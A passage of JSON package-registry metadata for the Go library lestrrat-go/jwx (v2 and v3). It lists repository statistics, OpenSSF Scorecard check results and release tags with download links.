,"stargazers_count":1.6419083990901688,"forks_count":2.175002106090815,"docker_downloads_count":null,"average":3.8998747986750963},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/internal/iter","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/internal/iter","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/internal/iter","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/internal/iter/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fiter/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fiter/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fiter/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fiter/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fiter/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Finternal%2Fiter/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":10993848,"name":"github.com/lestrrat-go/jwx/v3","ecosystem":"go","description":"Package jwx contains tools that deal with the various JWx (JOSE)\ntechnologies such as JWT, JWS, JWE, etc in Go.\n\nExamples are stored in a separate Go module (to avoid adding\ndependencies to this module), and thus does not appear in the\nonline documentation for this module.\nYou can find the examples in Github at https://github.com/lestrrat-go/jwx/tree/v3/examples\n\nYou can find more high level documentation at Github (https://github.com/lestrrat-go/jwx/tree/v2)\n\nFAQ style documentation can be found in the repository (https://github.com/lestrrat-go/jwx/tree/develop/v3/docs)","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx","versions_count":21,"first_release_published_at":"2024-11-01T06:22:40.000Z","latest_release_published_at":"2026-05-07T01:03:40.000Z","latest_release_number":"v3.1.1","last_synced_at":"2026-05-24T05:47:12.446Z","created_at":"2024-10-25T05:22:05.181Z","updated_at":"2026-05-24T05:47:12.446Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v3","install_command":"go get github.com/lestrrat-go/jwx/v3","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v3#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.